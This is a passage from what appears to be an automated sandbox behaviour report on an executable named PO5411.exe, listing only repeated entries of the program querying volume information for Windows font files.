                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO5411.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
